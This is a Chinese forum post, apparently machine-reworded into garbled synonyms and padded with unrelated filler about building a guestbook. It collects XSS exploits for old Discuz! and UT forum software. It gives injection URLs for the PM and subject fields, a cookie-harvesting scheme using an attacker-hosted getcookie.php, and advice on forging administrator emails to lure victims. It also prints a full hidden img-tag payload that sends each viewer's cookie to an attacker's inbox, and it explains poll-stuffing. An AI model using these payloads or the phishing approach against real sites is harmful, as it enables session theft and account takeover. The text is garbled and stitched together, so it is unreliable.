|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
根据功能来进行封装等。很多的不懂,在使用搜索引擎查找,或者请教老师和在老师详细的讲解、指导下,都能顺利解决。 在discuz!的发贴、回贴、PM等中的subject都没有经由过滤,所以也能够添加代码。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
后果是起首弹出本人的cookie
使用办法:把上述代码放置到img中。
合用版本:discuz!2.x
discuz!3.x
一种使用discuz!2.0破绽停止棍骗取得cookie的测验考试
经由过程测试XXXFan服装论坛的PM功效存在一个平安破绽,详细描写以下:
XXXFan的给某个会员发送悄然的链接以下(假定这个会员名字为XXXFan)
http://XXX/pm.php?action=send&username=XXXFan
由于服装论坛法式对会员名字没有停止过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字前面加上script代码。例如
http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"
下面的链接点击今后起首弹出的是本人的cookie内容。
固然咱们可以先在本人的站点上机关一个法式来搜集cookie,相似于
getcookie.php?cookie=
然而若何来诱使会员点击呢,假如复杂的放在服装论坛上,太轻易被辨认。所以可以使用discuz服装论坛法式的别的一个功效,“帖子引见给伴侣”功效。
由于discuz的这个功效对填写的emial地址没有停止任何过滤、分辨和模版,可以捏造任何人给他人发信,平安性很高。使用这个功效咱们就能够捏造ExploitFan的办理员给某个会员发一封信,诱使会员点击咱们筹办的URL,假如诱使就看本人的手腕了,例如可以说“服装论坛正在测试新功效,请您协助点击下面地址,咱们会在后台纪录您的点击在适合的工夫会给您增添积分以做嘉奖”等等。
由于链接地址是XXXFan的,并且发信人和邮件地址都是XXXFan的官方地址,所以可托度十分高,并且不会留下任何痛处。固然为了更高的平安性,可以在<script>里的内容加密,以进一步增添荫蔽性。
至于失掉cookie若何做,可以测验考试cookie棍骗或是暴力破解MD5暗码
本办法合用于大局部利用discuz2.0的服装论坛,至于discuz3.0的使用办法请介入在我之前宣布的discuz!悄然话破绽
【BUG】Discuz!投票的BUG
投票可以用
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(n为选项,从0入手下手)
的体例经由过程URL来直接投票
然而假如n>最大选项呢,嘻嘻~
照样提交胜利,不外增添了一个题目为空的选项
后果见:
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(谁人最初的空白的是我刚加的)
该破绽存在的版本:
Discuz!3.X
Discuz!2.X(能够,没有测试过)
Discuz!的代码破绽
这是接着昨天发明的破绽所睁开的,第一发明者(PK0909)。
详细的描写就不说了,上面是一个复杂的测试代码。
http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E
下面的代码是显示出本人的cookie
上面是在某个对照着名的服装论坛的测试代码,不管谁观察该网页城市把cookie送到指定的会员短信箱里,荫蔽性很好,就是假如有人援用你的贴,哈哈~这里城市跑出来,露馅了
[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]
发明discuz!UT 跨域站点的剧本破绽--短动静篇有关跨域站点的剧本破绽,已算长短常平成并广泛的破绽了。
有关详细的动静可以参阅:
http://www.cert.org/advisories/CA-2000-02.html
上面针对Discuz、UT服装论坛法式的悄然话局部加以申明
破绽顺应版本:
Discuz1.X
Discuz!2.0(0609,0820版)
Discuz!3.X
UT 1.0
破绽描写:
discuz!给指定会员发送悄然话利用的是相似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,然而name没有经由过滤直接显示在发送短动静的页面中,这就给偷cookie或更严重的损坏翻开了便利之门。
Discuz!3.X已改成http://XXX.net/pm.php?action=send&uid=XXXX相似的语句,防止了这个破绽,然而在选择短信文件夹的时分却没有经由过滤。一样发生了下面的破绽
例
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]
,下面的例子是显示本人的cookie。(针对Discuz!1.X Discuz!2.X)
http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
显示本人的cookie。(针对Discuz!3.X)
UT固然在主题上经由了过滤,也就是说把%27转换为';然而其收件人却没有过滤,所以一样有相似的破绽。例子略。(在分歧的UT服装论坛上发明其代码不尽不异,然而总的来讲都有相似的破绽)
伤害度:中弱
预防举措:
点击超等链接时请注重其真实内容。更多的平安补钉请亲切存眷官方服装论坛。 你的留言本应该加入注册以及分页功能了,而如果你更强的话,UI(用户界面)也可以加强,完成之后,感觉是不是特有成就感?不管怎么样,咱好歹是写了一个动态网站程序了,放在自己的网站上耍耍吧。 |
|